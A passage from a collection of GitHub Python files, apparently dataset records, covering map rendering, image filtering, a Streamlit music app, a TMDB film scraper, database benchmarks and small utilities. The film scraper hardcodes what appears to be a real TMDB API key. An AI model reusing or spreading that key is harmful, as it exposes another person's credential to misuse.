\"New York City\", \"radius\": 5000},\n #{\"city\": \"Kuala Lumpur\", \"radius\": 5000},\n #{\"city\": \"Istanbul\", \"radius\": 5000},\n]\n\nPALETTES = [\n #\"onedark\",\n \"yesterday-night\",\n]\n\npalettes = load_colour_palettes(Path(\"base16_schemes.json\"))\n\nfor place in PLACES:\n geolocator = Nominatim(user_agent=\"map_plotter\")\n location = geolocator.geocode(place[\"city\"])\n place_metadata = geolocator.reverse(location.point)\n\n EXPORT_DIR = Path(\"export\") / place[\"city\"]\n EXPORT_DIR.mkdir(exist_ok=True, parents=True)\n\n map = Map((location.latitude, 
location.longitude), place[\"radius\"])\n\n\n for palette in PALETTES:\n place_cleaned = place[\"city\"].replace(' ', '_').replace(',', '')\n map.export_image(\n destination=EXPORT_DIR / f\"{place_cleaned}_{palette}.png\",\n palette_name=palette,\n palette=palettes[palette],\n )\n\n add_city_name(\n input_image = EXPORT_DIR / f\"{place_cleaned}_{palette}.png\",\n place_name = place[\"city\"],\n output_image = EXPORT_DIR / f\"{place_cleaned}_{palette}_named.png\",\n palette = palettes[palette],\n )\n","repo_name":"dylan-robins/PrettyOSMRenderer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12256450967","text":"\"\"\"\n*Python file to make gaussian kernel and then blur image\n*outputs blurred img\n*\n\"\"\"\n\nimport cv2\nimport math\nimport numpy as np\nimport gaussKernel\n\nimg =cv2.imread('Lenna.png')\nr=5\nh=np.zeros((r, r))\n\n#python needs size of kernel\nkernel = np.ones((r,r), np.uint8)\n\n#own function in same folder\nh=gaussKernel.gaussKernel(r)\nimgOut = cv2.filter2D(img, -1, h)\n\n#python needs size of kernel\nkernel = np.ones((15,15), np.uint8)\n\n#erode checks kernel if any px is dark, darkens current px\n#dilate checks kernel if any px is light, lightens current px\nimgOutE = cv2.erode(img, kernel, iterations=1)\nimgOutD = cv2.dilate(img, kernel, iterations=1)\n\ncv2.imshow('image', img)\ncv2.imshow('gaussianBlur', imgOut)\ncv2.imshow('erode', imgOutE)\ncv2.imshow('dilate', imgOutD)\nprint(np.matrix(h))\n#wait for end key q\ncv2.waitKey(0)\n","repo_name":"rsashna/basicPyImgPro","sub_path":"blurImg.py","file_name":"blurImg.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16755145146","text":"import streamlit as st\nimport cluster as cl\nimport pandas as pd\nimport spotipy\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nimport folium\nfrom streamlit_folium import folium_static\n\n\nClient_id=os.getenv(\"client_id\")\nClient_secret=os.getenv(\"client_secret\")\nRedirect_uri=os.getenv(\"redirect_uri\")\n\n\nst.set_page_config(page_title=\"Your Music Your World\")\nst.markdown(\"

Your Music Your World\", unsafe_allow_html=True)\nst.markdown(\"---\")\n\nst.sidebar.markdown(\"

Index\", unsafe_allow_html=True)\nnav_buttons = [\"Introduction\", \"Liked Songs Clusters\", \"Ticketmaster\"]\nbutton_clicked = st.sidebar.radio(\"\", nav_buttons)\n\nst.sidebar.markdown(\"---\")\nif button_clicked == \"Introduction\":\n    st.markdown(\"

Music is a powerful form of expression and a window into our souls
    \", unsafe_allow_html=True)\n st.image(\"../images/Portada.jpg\")\n st.write(\"🎧🔍 This project analyzes your music preferences using data from your liked songs on Spotify and creates personalized playlists for two different moods: 🕯️ tranquil and melancholic, and 💃 motivated and cheerful. It also suggests concerts in your area featuring your favorite artists using the 🎫 Ticketmaster API.\")\n\n\nelif button_clicked == \"Liked Songs Clusters\":\n st.markdown(\"

Spotify Songs Features
    \", unsafe_allow_html=True)\n st.markdown(\"First lets understand songs features:\")\n features = {\n \"DANCEABILITY💃\": \"Describes how suitable a track is for dancing based on musical elements like tempo, rhythm stability, beat strength, and overall regularity.\",\n \"ENERGY🔥\": \"Measures the intensity and activity of a track. Energetic tracks are usually fast, loud, and noisy.\",\n \"LOUDNESS🔊\": \"Refers to the overall volume of a track.\",\n \"SPEECHINESS🗣️\": \"Measures the presence of spoken words in a track. Tracks with high speechiness are typically spoken word or rap.\",\n \"ACOUSTINESS🎸\": \"Measures the degree to which a track is acoustic (versus electronic). High acousticness means the track is mostly acoustic.\",\n \"VALENCE😊\": \"Describes the musical positivity of a track. Tracks with high valence sound more positive (happy, cheerful, etc.)\"\n}\n\n# Create an expander for each feature\n for feature, definition in features.items():\n expander = st.expander(feature)\n with expander:\n st.write(definition)\n\n st.write(\"🎵🌧️ Melancholic Recommendations: Acoustic songs with lower 'Energy' and speechiness are perfect for the quiet and melancolic mood.\")\n\n st.write(\"🎵☀️ Happy Recommendations: Songs with high 'Energy', as well as high 'Happiness' and 'Positivity' are perfect for a happy mood to get you up and dancing.\")\n\n df=pd.read_csv(\"../data/songs_you_like_clusterfeatures.csv\", index_col=0)\n features = ['Danceability', 'Energy','Loudness', 'Speechiness', 'Acousticness', 'Valence']\n st.markdown(\"

Connect to your Spotify 🤍 Songs
    \", unsafe_allow_html=True)\n \n \n cluster_stats= pd.read_csv(\"../data/cluster_stats.csv\", index_col = 0 )\n fig=cl.radar_plot(cluster_stats)\n st.pyplot(fig)\n \n if st.button(\"Create playlist\"):\n st.image(\"../images/Sunshine_State_of_mind.png\", caption=\"Sunshine State of Mind\")\n st.image(\"../images/Echoes_of_solitude.png\", caption=\"Echoes of Solitude\")\n\nelif button_clicked == \"Ticketmaster\":\n st.image(\"../images/ticketmaster.png\")\n st.sidebar.markdown(\"# Choose your perfect Ticketmaster Event \")\n st.write(\"Use the sidebar to fill your selection\")\n\n df_events=pd.read_csv(\"../data/df_events.csv\", index_col=0)\n \n #select your event \n st.markdown(\"## Find your perfect Ticketmaster Event \")\n #select country\n selected_country = st.sidebar.selectbox(\"Select a Country\", df_events[\"event_country\"].unique())\n filtered_df = df_events[df_events[\"event_country\"] == selected_country]\n #select year date\n selected_year = st.sidebar.selectbox(\"Select a Year\", df_events[df_events[\"event_country\"] == selected_country][\"year\"].unique())\n selected_month = st.sidebar.selectbox(\"Select a Month\", df_events[df_events[\"event_country\"] == selected_country][df_events[\"year\"] == selected_year][\"month\"].unique())\n\n filtered_df = filtered_df[filtered_df[\"year\"] == selected_year]\n filtered_df = filtered_df[filtered_df[\"month\"] == selected_month]\n\n #center the map\n center_lat = filtered_df[\"event_lat\"].mean()\n center_long = filtered_df[\"event_long\"].mean()\n m = folium.Map(location=[center_lat, center_long], zoom_start=3)\n for index, row in filtered_df.iterrows():\n event_name = row['event_name']\n event_city = row['event_city']\n event_lat = row['event_lat']\n event_long = row['event_long']\n artist = row['artist']\n url = row['url']\n \n # label shown\n popup_html = f'{event_name}
{artist}
    {url}'\n popup = folium.Popup(popup_html, max_width=250)\n folium.Marker(location=[event_lat, event_long], popup=popup, tooltip=event_city).add_to(m)\n\n # Mostrar el mapa\n folium_static(m)\n\n\n\n\n\n\n\n","repo_name":"elisagomezcambronero/Your_Music_Your_World","sub_path":"src/streamlit.py","file_name":"streamlit.py","file_ext":"py","file_size_in_byte":5381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7679921792","text":"import tmdbsimple as tmdb\nfrom datetime import datetime\nfrom filmood.models import *\nfrom filmood import db\nimport json\n\n\ntmdb.API_KEY = '765b0d1f4ca8757f641c2f8e9c95c05f'\n\n# cur_id = json.load(open('filmood/parser/last_film_id.json', 'r'))[\"last_id\"]\ncur_id = 1\nvalid_film_ids = [json.loads(line)[\"id\"] for line in open(\n 'filmood/parser/movie_ids_11_26_2019.json', 'r', encoding='utf-8')]\n\namount_of_films = 0\n# amount_of_films = len(Film.query.all())\n\nwhile amount_of_films < 50000:\n try:\n movie_info = tmdb.Movies(valid_film_ids[cur_id]).info()\n film = Film(\n title = movie_info['title'],\n release_date = datetime.strptime(movie_info['release_date'], '%Y-%m-%d'),\n runtime = movie_info['runtime'],\n backdrop_path = movie_info['backdrop_path'],\n poster_path = movie_info['poster_path'],\n imdb_id = movie_info['imdb_id'],\n overview = movie_info['overview'],\n vote_average = movie_info['vote_average']\n )\n\n for genre in movie_info['genres']:\n find_genre = Genre.query.filter_by(name=genre['name']).first()\n if find_genre:\n film.genres.append(find_genre)\n else:\n new_genre = Genre(name=genre['name'])\n film.genres.append(new_genre)\n\n db.session.add(film)\n db.session.commit()\n\n amount_of_films += 1\n\n except Exception as err:\n print(err)\n\n print(cur_id)\n cur_id += 1\n # with open('filmood/parser/last_film_id.json', 'w') as file:\n # file.write(json.dumps({\"last_id\": cur_id}))\n","repo_name":"Gena20/filmood","sub_path":"filmood/parser/film_parser.py","file_name":"film_parser.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22678352935","text":"import gc\nimport pickle\nimport shutil\nfrom xmlrpc.client import FastParser\n\nimport marisa_trie\nimport pycedar\nfrom tqdm import tqdm\n\nfrom freaddb.db_lmdb import SIZE_1GB, DBSpec, FReadDB, ToBytes, profile\n\n\n@profile\ndef dict_create_save(data_file: str, limit: int):\n db = [\n dict(),\n dict(),\n ]\n for i in range(limit):\n db[0][f\"Q{i + 1}\"] = i\n db[1][i] = f\"Q{i + 1}\"\n with open(data_file + \".pkl\", \"wb\") as f:\n pickle.dump(db, f)\n del db\n\n\n@profile\ndef dict_retrieval_single(data_file, queries):\n gc.collect()\n with open(data_file + \".pkl\", \"rb\") as f:\n lmdb = pickle.load(f)\n\n for query in queries:\n item = lmdb[0].get(query)\n if item is None:\n continue\n\n assert lmdb[1].get(item) == query\n\n\n@profile\ndef trie_create_save(data_file: str, limit: int):\n qid_list = marisa_trie.Trie([f\"Q{i + 1}\" for i in range(limit)])\n qid_list.save(data_file)\n return True\n\n\n# @profile\n# def rtrie_create_save(data_file: str, limit: int):\n# keys = [f\"Q{i + 1}\" for i in range(limit)]\n# values = [tuple([i]) for i in range(limit)]\n# qid_list = marisa_trie.RecordTrie(\"I\", zip(keys, values))\n# qid_list.save(data_file)\n# return True\n\n\n# @profile\n# def rtrie_load(data_file: str):\n# qid_list = marisa_trie.RecordTrie(\"I\")\n# qid_list.load(data_file)\n# return qid_list\n\n\n@profile\ndef 
trie_retrieval(data_file, queries):\n gc.collect()\n trie = marisa_trie.Trie()\n trie.load(data_file)\n\n for query in queries:\n item = trie.get(query)\n if item is None:\n continue\n\n assert trie.restore_key(item) == query\n\n\n@profile\ndef lmdb_create_save(data_file: str, limit: int):\n data_schema = [\n DBSpec(name=\"qid_lid\"),\n DBSpec(name=\"lid_qid\", integerkey=True),\n ]\n db = FReadDB(\n db_file=data_file,\n db_schema=data_schema,\n buff_limit=SIZE_1GB,\n split_subdatabases=True,\n )\n for i in range(limit):\n db.add_buff(\"qid_lid\", f\"Q{i + 1}\", i, is_serialize_value=False)\n db.add_buff(\"lid_qid\", i, f\"Q{i + 1}\", is_serialize_value=False)\n\n db.save_buff()\n db.compress(print_status=False)\n db.close()\n\n\n@profile\ndef lmdb_retrieval_single(data_file, queries):\n gc.collect()\n lmdb = FReadDB(db_file=data_file, readonly=True)\n for query in queries:\n item = lmdb.get_value(\"qid_lid\", query)\n if item is None:\n continue\n assert lmdb.get_value(\"lid_qid\", item) == query\n\n\n@profile\ndef lmdb_retrieval_multi(data_file, queries):\n gc.collect()\n lmdb = FReadDB(db_file=data_file, readonly=True)\n lids = lmdb.get_values(\"qid_lid\", queries)\n lmdb.get_values(\"lid_qid\", lids)\n\n\n@profile\ndef cedar_create_save(data_file: str, limit: int):\n d_trie = pycedar.dict()\n for i in range(limit):\n d_trie.set(f\"Q{i + 1}\", i)\n d_trie.save(data_file)\n return True\n\n\n@profile\ndef cedar_load(data_file: str):\n d_trie = pycedar.dict()\n d_trie.load(data_file)\n return d_trie\n\n\n@profile\ndef cedar_retrieval_single(trie, queries):\n lids = {}\n for query in queries:\n item = trie.get(query)\n if item is None or (isinstance(item, int) and item < 0):\n continue\n\n lids[item] = query\n\n for lid, query in lids.items():\n item = trie.find_values(lid)\n for i in item:\n assert i == query\n break\n\n\n@profile\ndef cedar_retrieval_multi(trie, queries):\n lids = {}\n for query in queries:\n item = trie.get(query)\n if item is None:\n continue\n\n lids[item] = query\n\n for lid, query in lids.items():\n item = trie.restore_key(lid)\n assert item == query\n\n\ndef bench_trie_vs_lmdb(limit=100_000):\n data_file = \"/tmp/freaddb/db_test_large_qid_split_1\"\n data_file_trie = \"/tmp/freaddb/db_test_large_qid_split_2.trie\"\n shutil.rmtree(data_file, ignore_errors=True)\n shutil.rmtree(data_file_trie, ignore_errors=True)\n\n queries = [f\"Q{i}\" for i in range(limit)] # if i % 10 == 1\n dict_create_save(data_file, limit)\n dict_retrieval_single(data_file, queries)\n #\n # Test with lmdb\n lmdb_create_save(data_file, limit)\n lmdb_retrieval_single(data_file, queries)\n lmdb_retrieval_multi(data_file, queries)\n\n # Test Tries\n trie_create_save(data_file_trie, limit)\n trie_retrieval(data_file_trie, queries)\n # del qid_list\n\n # cedar_create_save(data_file_trie, limit)\n # qid_list = cedar_load(data_file_trie)\n # cedar_retrieval_single(qid_list, queries)\n\n # Test Record Trie\n # not work\n # rtrie_create_save(data_file_trie, limit)\n # rqid_list = rtrie_load(data_file_trie)\n # trie_retrieval(rqid_list, queries)\n\n\nif __name__ == \"__main__\":\n bench_trie_vs_lmdb(limit=1_000_000)\n # import dawg\n # dawg.IntDAWG({'foo': 1, 'bar': 2, 'foobar': 3})\n \"\"\"\n 100%|████████████████████████████████████████████████████████████████████████████████████| 1_000_000/1_000_000 [00:03<00:00, 308873.83it/s]\n qid_lid : 97.95% - 21.2MiB/1.0GiB\n lid_qid : 97.94% - 21.3MiB/1.0GiB\n Compressed: 97.95% - 42.5MiB/2.0GiB\n lmdb_create_save Time: 0:00:12.703496 RSS: 90.2MiB VMS: 
575.7MiB\n lmdb_load Time: 0:00:00.002766 RSS: 24.0KiB VMS: 42.5MiB\n lmdb_retrieval_single Time: 0:00:05.498542 RSS: 42.6MiB VMS: 0B\n lmdb_retrieval_multi Time: 0:00:04.404589 RSS: 28.9MiB VMS: 26.0MiB\n trie_create_save Time: 0:00:00.846476 RSS: 55.0MiB VMS: 30.8MiB\n trie_load Time: 0:00:00.000551 RSS: 8.0KiB VMS: 0B\n trie_retrieval Time: 0:00:00.650987 RSS: 424.0KiB VMS: 0B\n\n trie_create_save Time: 0:00:00.912360 RSS: 77.6MiB VMS: 39.9MiB\n trie_load Time: 0:00:00.001336 RSS: 1.5MiB VMS: 0B\n trie_retrieval Time: 0:00:00.139793 RSS: 1.4MiB VMS: 0B\n 100%|████████��███████████████████████████████████████████████████████████████████████████| 1000000/1000000 [00:03<00:00, 287676.39it/s]\n qid_lid : 97.95% - 21.2MiB/1.0GiB\n lid_qid : 97.94% - 21.3MiB/1.0GiB\n Compressed: 97.95% - 42.5MiB/2.0GiB\n lmdb_create_save Time: 0:00:10.928423 RSS: 55.5MiB VMS: 26.7MiB\n lmdb_load Time: 0:00:00.001359 RSS: 24.0KiB VMS: 42.5MiB\n lmdb_retrieval_single Time: 0:00:01.310285 RSS: 42.5MiB VMS: 0B\n lmdb_retrieval_multi Time: 0:00:00.848976 RSS: 5.6MiB VMS: 2.0MiB\n\n trie_create_save Time: 0:01:31.817849 RSS: 905.5MiB VMS: 1.1GiB\n trie_load Time: 0:00:00.042253 RSS: 36.0KiB VMS: 0B\n trie_retrieval Time: 0:00:14.964123 RSS: 36.9MiB VMS: 79.0MiB\n 100%|████████████████████████████████████████████████████████████████████████████████| 100000000/100000000 [05:56<00:00, 280513.48it/s]\n qid_lid : 24.64% - 2.3GiB/3.0GiB\n lid_qid : 24.81% - 2.3GiB/3.0GiB\n Compressed: 24.72% - 4.5GiB/6.0GiB\n lmdb_create_save Time: 0:42:13.980900 RSS: 1.4GiB VMS: 9.2MiB\n lmdb_load Time: 0:00:00.005170 RSS: 536.0KiB VMS: 4.5GiB\n lmdb_retrieval_single Time: 0:02:38.491916 RSS: 5.2GiB VMS: 0B\n lmdb_retrieval_multi Time: 0:01:15.016830 RSS: 581.2MiB VMS: 260.0MiB\n --> Using trie to store \n \"\"\"\n","repo_name":"phucty/freaddb","sub_path":"scripts/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":7782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16726308344","text":"from setuptools import setup\nimport re\n\nVERSION_FILE = \"tornado_flickrapi/_version.py\"\ntry:\n vers_content = open(VERSION_FILE, \"r\").read()\n version_str = re.search(r'__version__ = \"(.+?)\"', vers_content).group(1)\nexcept:\n raise RuntimeError(\"Could not read version file.\")\n\nsetup(\n name=\"tornado-flickrapi\",\n version=version_str,\n description=\"Async Python wrapper for the Flickr API based on Tornado framework\",\n author=\"Dmitriy Bryndin\",\n author_email=\"bryndin@gmail.com\",\n url=\"https://github.com/bryndin/tornado_flickrapi\",\n packages=[\"tornado_flickrapi\"],\n install_requires=[\n \"oauth\",\n \"tornado\",\n ],\n license=\"BSD License\",\n)\n","repo_name":"bryndin/tornado-flickr-api","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"20955870657","text":"import xbmc\nimport xbmcvfs\nimport Folder\nimport urllib\nimport urlparse\n\n\nNAME_QUERY = 'fileName'\nFOLDER_NAME_QUERY = 'folderName'\nFOLDER_PATH_QUERY = 'folderPath'\n\n\n\n\n\n\nclass File(object):\n def __init__(self, name, folder):\n self.name = name\n self.folder = folder\n self.path = folder.fullpath\n self.fullpath = folder.fullpath + '/' + name\n \n if '.' 
in name:\n self.soleName, self.extension = name.split('.', 1)\n else:\n self.soleName = name\n self.extension = None\n \n \n self._pathTranslated = None\n self._fullpathTranslated = None\n \n \n def exists(self):\n return xbmcvfs.exists(self.fullpath)\n \n def delete(self):\n xbmcvfs.delete(self.fullpath)\n \n \n def deleteIfExists(self):\n if self.exists():\n self.delete()\n \n \n def pathTranslated(self):\n return self.folder.fullpathTranslated()\n \n \n \n def fullpathTranslated(self):\n if self._fullpathTranslated is None: \n self._fullpathTranslated = xbmc.translatePath(self.fullpath)\n \n return self._fullpathTranslated\n \n \n \n def fileHandler(self, write=False):\n if write:\n permission = 'w'\n else:\n permission = 'r'\n \n fullpath = self.fullpathTranslated()\n return xbmcvfs.File(fullpath, permission)\n \n def contents(self):\n fh = self.fileHandler();\n \n contents = fh.read()\n fh.close()\n \n return contents\n \n \n def lines(self):\n contents = self.contents()\n return contents.split('\\n')\n \n \n def write(self, contentsStr):\n fh = self.fileHandler(write=True)\n fh.write(contentsStr)\n fh.close()\n \n \n \n def encodedQuery(self):\n query = urllib.urlencode({NAME_QUERY: self.name,\n FOLDER_NAME_QUERY: self.folder.name,\n FOLDER_PATH_QUERY: self.folder.path\n })\n \n \n \n return query\n \n \n def dumpObject(self, dumpObject):\n import dill as pickle\n \n with open(self.fullpathTranslated(), 'wb') as f:\n pickle.dump(dumpObject, f)\n \n \n def loadObject(self):\n import dill as pickle\n \n with open(self.fullpathTranslated(),'rb') as f:\n loadedObject = pickle.load(f)\n \n return loadedObject\n\n\n\n\n \n \n\ndef fromQuery(query):\n parsedQuery = urlparse.parse_qs(query)\n \n name = parsedQuery[NAME_QUERY][0]\n folderName = parsedQuery[FOLDER_NAME_QUERY][0]\n folderPath = parsedQuery[FOLDER_PATH_QUERY][0]\n \n folder = Folder.Folder(folderName, folderPath)\n newFile = File(name, folder)\n \n return newFile\n \n \n \n \n \ndef fromFullpath(fullpath):\n folderPath, folderName, fileName = fullpath.rsplit('/', 2)\n \n folder = Folder.Folder(folderName, folderPath)\n newFile = File(fileName, folder)\n \n return newFile\n\ndef fromNameAndDir(fileName, dirPath):\n folder = Folder.fromFullpath(dirPath)\n newFile = File(fileName, folder)\n \n return newFile\n\ndef fromInvalidNameAndDir(originalName, dirPath):\n import utils\n \n name = utils.createValidName(originalName)\n return fromNameAndDir(name, dirPath) \n\n\ndef loadObjectFromFP(fullpath):\n dumpFile = fromFullpath(fullpath)\n return dumpFile.loadObject()","repo_name":"SportySpice/Collections","sub_path":"src/file/File.py","file_name":"File.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"39989465955","text":"#########################################\n# NORA\n# Nora is a voice assistant built on simplicity.\n# Commands are added to a queue by by the user giving a verbal\n# command (ex. \"Nora, what's the weather?\") or via the web\n# interface. 
Commands are processed in the order received.\n#########################################\nfrom core_utils.core_core.channels import Channels\nfrom core_utils.core_core.settings_manager import SettingsManager\nfrom core_utils.settings_tool import SettingsTool\nimport core_utils.intent_parser as intent_parser\nimport core_utils.skill_creator as skill_creator\nfrom core_utils.audio_utils import AudioUtils\nfrom core_utils.wakeword import Wakeword\nfrom core_utils.server import create_server\nfrom threading import Thread, Event\nimport queue\n\n\n#######################\n# Threading\n#######################\nspeech_queue = queue.Queue()\nshutdown_event = Event()\n\n\ndef consume_input():\n \"\"\" Consumes the input from the queue. \n Returns True if the exit command was received. \"\"\"\n text = speech_queue.get()\n if shutdown_event.is_set():\n return\n intent_data = intent_parser.parse_intent(text)\n\n # run the intent\n if intent_data is not None:\n intent_data[\"callback\"](intent_data)\n else:\n audio_utils.say(\"No intent detected\")\n\n\ndef await_wakeword_thread():\n \"\"\" Thread for the wakeword.\n Loops and waits for the wakeword to be spoken. When it is,\n it grabs the user's command.\n \"\"\"\n while not shutdown_event.is_set():\n wakeword.await_wakeword(shutdown_event=shutdown_event)\n if shutdown_event.is_set():\n break\n\n print(\"Listening...\")\n text = audio_utils.listen()\n if text is not None:\n print(\"You said: \" + text)\n speech_queue.put(text)\n\n\ndef shutdown_system(message=None):\n \"\"\" Shuts down the system. \"\"\"\n print(\"Save settings\")\n settings_manager.save_settings()\n shutdown_event.set()\n\n\n\n#######################\n# Setup\n#######################\nchannels = Channels()\nsettings_manager = SettingsManager()\n\n# initialize audio utilities\naudio_utils_settings_tool = SettingsTool(settings_manager, setting_path=\"audio_utils\")\naudio_utils = AudioUtils(settings_tool=audio_utils_settings_tool, channels=channels)\n\n# import the skills\nskills = skill_creator.import_skills(settings_manager=settings_manager, channels=channels, audio_utils=audio_utils)\n\n# initialize the intent parser\nintent_settings_tool = SettingsTool(settings_manager=settings_manager,\n setting_path='intent parser')\nintent_parser = intent_parser.IntentParser(skills,\n settings_tool=intent_settings_tool, channels=channels,)\n\n# initialize wakeword\nwakeword_settings_tool = SettingsTool(settings_manager=settings_manager,\n setting_path='wakeword.picovoice')\nwakeword = Wakeword(settings_tool=wakeword_settings_tool,\n audio_utils=audio_utils)\n\n#get the name of the assiantat\nname = settings_manager.get_setting(\"name\", \"Carmen\")\n\nchannels.subscribe(shutdown_system, 'system')\n\n# calibrating audio\nprint(\"Calibrating...\")\naudio_utils.calibrate_silence()\nprint(\"Calibration complete!\")\n\n\n# CTRL+C handler\nimport signal\nimport sys\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n shutdown_system()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# Launch the server\nserver = create_server(channels=channels, settings_manager=settings_manager)\n\n########################################\n# main loop\n########################################\nwith server.run_in_thread():\n # startup fanciness\n name = settings_manager.get_setting(\"name\")\n audio_utils.say(f\"Hello, I am {name}. 
I am a virtual assistant.\")\n\n # start the wakeword thread\n wakeword_thread = Thread(target=await_wakeword_thread)\n wakeword_thread.start()\n\n # start the main loop\n while not shutdown_event.is_set():\n consume_input()\n\n# stop any system threads\nwakeword_thread.join(1)","repo_name":"aamott/Nora-Voice-Assistant","sub_path":"nora.py","file_name":"nora.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38469997980","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\n\nimport boto\nimport pytest\nimport simplejson\nfrom mock import MagicMock\n\nfrom amira.sqs import SqsHandler\nfrom amira.sqs import SqsQueueNotFoundException\n\n\nTEST_DATA_DIR_PATH = 'tests/data'\n\n\n@pytest.fixture\ndef mock_sqs_queue():\n boto.sqs.connect_to_region = MagicMock()\n sqs_connection_mock = boto.sqs.connect_to_region.return_value\n return sqs_connection_mock.get_queue.return_value\n\n\ndef read_s3_event_notifications_file(s3_event_notifications_file_path):\n with open(s3_event_notifications_file_path) as fp:\n s3_event_notifications = simplejson.load(fp)\n json_s3_event_notifications = [\n simplejson.dumps(s3_event_notification)\n for s3_event_notification in s3_event_notifications\n ]\n return json_s3_event_notifications\n\n\ndef create_s3_event_notification_message_mocks(\n s3_event_notifications_file_name):\n \"\"\"Creates SQS queue message mocks that will return the JSON content of\n `s3_event_notifications_file_path` JSON file as the body of the message.\n \"\"\"\n s3_event_notifications_file_path = '{0}/{1}'.format(\n TEST_DATA_DIR_PATH, s3_event_notifications_file_name)\n json_s3_event_notifications = read_s3_event_notifications_file(\n s3_event_notifications_file_path)\n s3_event_notification_message_mocks = [\n MagicMock(**{'get_body.return_value': json_s3_event_notification})\n for json_s3_event_notification in json_s3_event_notifications]\n return s3_event_notification_message_mocks\n\n\ndef mock_s3_event_notifications(\n mock_sqs_queue, s3_event_notifications_file_name):\n \"\"\"`SqsHandler.get_created_objects()` is a generator, so we need to\n mock multiple values returned by `get_messages()` method.\n In this case only one as the test cases do not operate on more than\n one message.\n \"\"\"\n s3_event_notification_message_mocks = \\\n create_s3_event_notification_message_mocks(\n s3_event_notifications_file_name)\n mock_sqs_queue.get_messages.side_effect = \\\n [s3_event_notification_message_mocks]\n return s3_event_notification_message_mocks\n\n\nclass TestSqsHandler():\n\n def test_queue_not_found(self):\n boto.sqs.connect_to_region = MagicMock()\n sqs_connection_mock = boto.sqs.connect_to_region.return_value\n sqs_connection_mock.get_queue.return_value = None\n\n with pytest.raises(SqsQueueNotFoundException) as e:\n SqsHandler('us-west-1', 'godzilla')\n\n assert 'SQS queue godzilla not found.' 
== str(e.value)\n boto.sqs.connect_to_region.assert_called_once_with('us-west-1')\n sqs_connection_mock.get_queue.assert_called_once_with('godzilla')\n\n def test_get_created_objects(self, mock_sqs_queue):\n s3_event_notification_message_mocks = mock_s3_event_notifications(\n mock_sqs_queue, 's3_event_notifications.json')\n sqs_handler = SqsHandler('us-west-1', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n actual_key_names = [created_object.key_name\n for created_object in created_objects]\n\n expected_key_names = [\n 'AMIRA-1561-2016_01_11-10_54_07.tar.gz',\n 'AMIRA-1562-2016_01_11-10_54_47.tar.gz',\n 'AMIRA-1563-2016_01_11-10_54_58.tar.gz',\n 'AMIRA-1564-2016_01_11-10_55_12.tar.gz',\n 'AMIRA-1565-2016_01_11-10_55_32.tar.gz',\n 'AMIRA-1566-2016_01_11-10_55_49.tar.gz',\n 'AMIRA-1567-2016_01_11-10_56_09.tar.gz'\n ]\n assert expected_key_names == actual_key_names\n\n mock_sqs_queue.delete_message_batch.assert_called_once_with(\n s3_event_notification_message_mocks)\n\n def test_get_created_objects_no_created_objects(self, mock_sqs_queue):\n mock_sqs_queue.get_messages.side_effect = [[]]\n\n sqs_handler = SqsHandler('us-west-1', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n assert 0 == len(list(created_objects))\n\n assert mock_sqs_queue.delete_message_batch.called is False\n\n def test_get_created_objects_no_records(self, mock_sqs_queue):\n \"\"\"Tests the behavior of `get_created_objects()` method in case\n the message received from SQS does not contain the \"Records\"\n field in the message body.\n \"\"\"\n mock_s3_event_notifications(\n mock_sqs_queue, 's3_test_event_notification.json')\n\n sqs_handler = SqsHandler('us-west-2', 'godzilla')\n created_objects = sqs_handler.get_created_objects()\n created_objects = list(created_objects)\n assert [] == created_objects\n","repo_name":"padfoot999/amira","sub_path":"tests/sqs_test.py","file_name":"sqs_test.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13878790012","text":"class Army:\n def __init__(self):\n self.name=\"Anamika\"\n self.gn=self.Gun() # inner class object\n def show(self):\n print(\"Name :\",self.name) \n\n class Gun:\n def __init__(self):\n self.name=\"AK47\" \n self.capacity=\"75 rounds\"\n self.length='34.3 In'\n\n def disp(self):\n print(\"Gun Name :\",self.name)\n print(\"Gun Capacity :\",self.capacity)\n print(\"Gun Length :\",self.length)\n\na=Army()\nprint('Outer Class variable and method')\nprint(a.name)\na.show()\nprint('Inner Class variable and method')\nprint(a.gn.name)\na.gn.disp()\ng=a.gn\nprint(g.capacity)\n\n# we can also crete object of inner class\ng=Army().Gun()\nprint(g.length)","repo_name":"anamikagupta17/Python","sub_path":"advance/nestedClass.py","file_name":"nestedClass.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21524108950","text":"def fun(s):\n # return True if s is a valid email, else return False\n\n if s.count('@') != 1 or s.count('.') != 1:\n return False\n\n username, domain = s.split('@')\n website, extension = domain.split('.')\n \n if (not len(username) > 0) or (not len(website) > 0):\n return False\n\n for i in range(len(username)):\n if username[i].isalpha() or username[i].isdigit() or username[i] == '_' or s[i] == '-':\n continue\n else:\n return False\n \n for i in range(len(website)):\n if domain[i].isalpha() or 
